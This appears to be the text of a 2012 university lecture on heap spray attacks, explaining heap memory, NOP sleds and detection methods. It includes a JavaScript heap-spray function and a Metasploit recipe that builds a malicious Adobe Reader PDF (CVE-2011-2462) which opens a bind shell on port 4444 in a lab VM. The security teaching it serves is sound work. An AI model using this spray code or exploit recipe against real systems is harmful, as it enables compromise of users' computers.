Heaps of Heap-based Memory Attacks - GMU CS Department

Heaps of Heap-based Memory Attacks Kevin Leach [email protected] Center for Secure Information Systems

3 October 2012

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

1 / 23

Goals

I

During this lecture, you will be exposed to

1. How heaps function on different platforms 2. How and why heap spray attacks function 3. How to detect and analyze heap spray attacks 4. How to use Metasploit to produce attack samples

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

2 / 23

What is Heap Memory?

I

Very different from the heap data structure (i.e., not the heap from ‘heap sort’)

I

Programs require storage for variables, buffers, etc.

I

int x[50]; This is a static variable, located on the stack. Consider int x[n]; where n is an input.

I

I

I

In essence: What happens when you don’t know how large a variable needs to be?

Notepad can handle arbitrarily large text files I

Does it allocate 1GB all the time just because it might need to open 1GB files?

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

3 / 23

Overview of Dynamic Memory I

Managed by OS

I

Allocated dynamically as process executes

I

Must be deallocated (e.g., free or garbage collection) Heap structure highly platform-dependent

I

I

Windows maintains multiple heaps for each process I I I

I

Linux has only one heap per thread I I

I

Default heap C Runtime heap (C-based allocators like malloc()) Application private heaps (created via HeapCreate()) Allocated one page at a time via sbrk system call typically managed by an allocator (e.g., glibc)

Specialized allocator implementations

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

4 / 23

Overview of Dynamic Memory Heap memory

Free List

Contiguous virtual memory, some allocated

Maintains free blocks in the heap

0xFFFF

PrevSize

Size

Other Metadata...

Data...

size1

b1

b2

b3

size2

c1

c2

cn

size3 size4

Allocated blocks may

bn

d1

...

not be contiguous

sizen

Contiguous free blocks are typically coalesced. 0x0000 K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

5 / 23

Diversion: von Neumann Machine I

Monolithic memory M contains: I I I

I

Program code P Program data D P ∩ D 6= ∅, i.e. Program and data may be the same!

CPU with program counter I loads MI I I I

No distinction as to whether MI ∈ P, D Execute MI , increment I Repeat ad nauseam (Fetch/Execute cycle)

I

In other words, data can become instructions in the CPU

I

In any stored program computing machine, data must become code at some point

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

6 / 23

Heap Spray Attack Justification

I

Easy deployment in scripting languages I I I

Easy to trick users to download infected file Ubiquity of programs that enable injecting code into the heap Popular host-based attack rather than server-based

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

7 / 23

Anatomy of a Heap Spray Attack I

Force vulnerable application to allocate large space in heap I

Typically use high-level scripting languages (JavaScript, ActionScript) I

I I I

Not necessarily malicious I

I

Trivially deployed (godaddy + HTML, PDF with embedded JavaScript) Easy obfuscation (rename variables) Evades network intrusion detection systems It is perfectly fine to allocate giant arrays in your JavaScript code

Add binary code into the heap I I

Typically lots of NOP-like instructions followed by shellcode Opportunity for polymorphism

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

8 / 23

Anatomy of a Heap Spray Attack I

I

Exploit a vulnerability that enables mutating program counter (EIP) Hopefully, the EIP lands in the heap and the malicious code will execute I

I

Consider: Heap spray attacks1 exist because all modern computing machines follow the von Neumann machine model!2 I

I

1 2

Improve likelihood of success via NOP sled and/or copying the payload multiple times

Separating instructions from data solves the problem (Harvard architecture) Impractical to make such a sweeping architectural change

In fact, most memory-based attacks a.k.a the Princeton architecture

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

9 / 23

Polymorphic Heap Spray Attacks

I

The nop instruction 90h is not the only instruction that behaves like a NOP. I I

I

I I

Consider w, the set of registers used by the payload. If ∆wi = 0 ∀ i ∧ eippre < eippost < eippayload , then the payload will execute correctly. In other words, any sequence of instructions that has a net zero effect on all registers used by the payload behave like a NOP sled, provided it does not jump over the payload. Giant number of permutations in your NOP sled Increases (marginally) the risk of payload failure

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

10 / 23

Example - Overview 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

function spray shellcode () { bbb = u n e s c a p e ( ’#{e s c a p e d p a y l o a d } ’ ) ; c c c = u n e s c a p e ( ”%u 0 c 0 c ” ) ; c c c += c c c ;

// a r b i t r a r y p a y l o a d // o r ecx , 0Ch // p r o d u c e word l e n g t h

w h i l e ( c c c . l e n g t h + 20 + 8 < ( 0 x8000 + 0 x8000 ) ) c c c += c c c ; i 1 = 0 x 0 c 0 c − 0 x24 ; ddd = c c c . s u b s t r i n g ( 0 , i 1 / 2 ) ; ddd += bbb ; // i n s e r t p a y l o a d ddd += c c c ; // more n o p s l e d i 2 = 0 x4000 + 0 x c 0 0 0 ;

e e e = ddd . s u b s t r i n g ( 0 , i 2 / 2 ) ;

f o r ( ; e e e . l e n g t h < 0 x40000 + 0 x40000 ; ) e e e += e e e ; // c o p y t h e nop−p a y l o a d−nop r e g i o n m u l t i p l e t i m e s i 3 = ( 0 x1020 − 0 x08 ) / 2 ; f f f = e e e . s u b s t r i n g ( 0 , 0 x80000 − i 3 ) ; // e n s u r e maximal l e n g t h f o r e l e m e n t ggg = new A r r a y ( ) ; // d y n a m i c a l l y a l l o c a t e d i n heap f o r ( hhh = 0 ; hhh < 0 x 1 e 0 + 0 x10 ; hhh++) ggg [ hhh ] = f f f + ” s ” ; // dump t h e c o d e a l l o v e r t h e heap ( ggg a r r a y ) }

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

11 / 23

Example - 1

1 2 3

bbb = u n e s c a p e ( ’#{e s c a p e d p a y l o a d } ’ ) ; c c c = u n e s c a p e ( ”%u 0 c 0 c ” ) ; c c c += c c c ;

4 5

w h i l e ( c c c . l e n g t h + 20 + 8 < ( 0 x8000 + 0 x8000 ) ) c c c += c c c ;

I

This puts binary representations of the payload (shellcode) and NOP sled.

I

Note that 0x0c0c0c behaves like a NOP sled. It executes or ecx, 0Ch.

I

Also serves as return address

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

12 / 23

Example - 2 1 2

i 1 = 0 x 0 c 0 c − 0 x24 ; ddd = c c c . s u b s t r i n g ( 0 , i 1 / 2 ) ; ddd += bbb ; ddd += c c c ;

3 4

1 2 3

i 2 = 0 x4000 + 0 xc000 ; e e e = ddd . s u b s t r i n g ( 0 , i 2 / 2 ) ; I

Unimportant... cuts code to size, puts payload between two NOP sleds

I

Essentially, this is done to lower the chance that execution lands in the middle of the shellcode

f o r ( ; e e e . l e n g t h < 0 x40000 + 0 x40000 ; ) e e e += e e e ; i 3 = ( 0 x1020 − 0 x08 ) / 2 ; f f f = e e e . s u b s t r i n g ( 0 , 0 x80000 − i 3 ) ; I

Creates ‘packages’ of NOP-payload-NOP sections

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

13 / 23

Example - The Important Part

1 2 3

ggg = new A r r a y ( ) ; f o r ( hhh = 0 ; hhh < 0 x1e0 + 0 x10 ; hhh++) ggg [ hhh ] = f f f + ” s ” ; I

This causes the JavaScript engine to make space in the heap (new);

I

The loop copies the ‘package’ multiple times into this dynamically allocated array.

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

14 / 23

Heap Spray Attack Execution 0x3fffffff

Stack

Stack Free Memory

Free Memory Heap Grows up

now contains NOP sled and payload

Heap Program code...

Program code...

0x00000000

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

15 / 23

Heap Spray Attack Execution I I

Heap contains many instances of NOP sled and payload This effectively increases the surface area of the attack I

Do not need the exact address of the payload I I I

n: number of payload instances s: size of nop sled, in bytes success: occurs when the payload successfully executes

Without NOP sled3 : P (success) = With NOP sled:

n 232

s 232 P (success) = 1.0

P (success) = lim

sled size→∞ I I

Platform transparency Increases running time

3 Assuming uniformly distributed random payload target address in a 4GB address space K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

16 / 23

Detecting Heap Spray Attacks I

Signature of attack code I I I

I

Signature of payload I I I

I I

find infected file on disk ... find the heap spray function in memory ... new exploits will surely become available find the shellcode in memory ... extremely small footprint new payloads may become available

Signature-based detection is weak NOP sled presence I I I

NOP sled is sizable Typically low entropy Easy to detect lots of malloc calls (in an ADS)

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

17 / 23

Detecting NOP Sleds I

Requirement: detect NOP sled before the payload executes I

I

I

Polling-based? I I

I

Regular expressions Entropy calculation

Behavior-based? I I

I

Since heap interaction is so slow, we are at an advantage here Allocating 1GB takes on the order of seconds We can ensure detection so long as our system executes more rapidly than the heap spray attack can finish executing.

Execute in a sandbox, see what happens Microsoft Nozzle

Data Execution Prevention? I

Easy to circumvent (fundamentally, still a von Neumann machine)

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

18 / 23

Heap Spray with Metasploit

I I

Metasploit framework can produce attack samples Extensible plugin system I

I I

I

Ruby scripts that produce attacks Check [/opt/metasploit/]msf3/modules/exploits Allows arbitrary payload insertion with different exploits Can produce vulnerable/malicious files, servers, etc.

We will use CVE-2011-2462 I I I I

This is a vulnerability in Adobe Reader 9 and 10 It uses embedded JavaScript to spray the heap Then it uses crafted embedded U3D data to hijack execution You open the PDF, it hangs for a bit, then the payload executes

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

19 / 23

Creating the malicious PDF with MSF

I

In Linux with Metasploit installed (e.g. the VCL image): 1. #> msfconsole 2. msfconsole > use exploit/windows/fileformat/adobe reader u3d 3. msfconsole (adobe reader u3d) > show payloads 4. msfconsole (adobe reader u3d) > set PAYLOAD generic/shell bind tcp 5. msfconsole (adobe reader u3d) > set LHOST 127.0.0.1 6. msfconsole (adobe reader u3d) > exploit

I

This will produce a malicious msf.pdf file under ˜/.msf4

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

20 / 23

Creating the malicious PDF with MSF I

msfconsole gives you access to the metasploit tools I

You can use it to produce attack samples, output payloads, inject payloads, or morph attacks

I

The use command instructs the console to work with the given exploit or vulnerability In our case, we’re using the adobe reader u3d exploit

I

show payloads lists all of the different shellcodes that can be placed in the given attack Once a payload is chosen (via set PAYLOAD), the attack can be configured

I

I

I

I

The generic/shell bind tcp payload listens on a given port for external connections The Ruby script for each attack is parameterized enable high customization In the case of this exploit, we must set the LHOST variable so that the shell knows which interface to bind to

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

21 / 23

Running a heap spray attack 1. (optional) copy the msf file to your home directory 2. Start a Windows XP SP3 Base VCL image and connect to it 3. Download and run this file: http://pedge.mesa.gmu.edu/adobe.exe (it’s Adobe Acrobat 9.4.0) 4. (optional) move your msf.pdf file to this machine Or download: http://pedge.mesa.gmu.edu/msf.pdf 5. Disable the Windows firewall 6. Open the msf.pdf file (You might have to accept Acrobat’s License) I

Sometimes, DEP will catch it and close Adobe. It may take 2-3 attempts for it to execute successfully.

7. open a command prompt (run cmd) 8. run telnet 127.0.0.1 4444 9. If you used the generic/shell bind tcp payload, you should be connected to a command prompt in your computer (a shell) K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

22 / 23

Discussion

I

If you want to see the actual heap spray, download and install CheatEngine

I

Attach to the AdobeRdr32 process

I

Search for the hex string, 0c0c0c0c0c0c0c0c

I

You can see the NOP sled and payload in memory

K. Leach (CSIS)

Heaps of Heap-based Memory Attacks

3 October 2012

23 / 23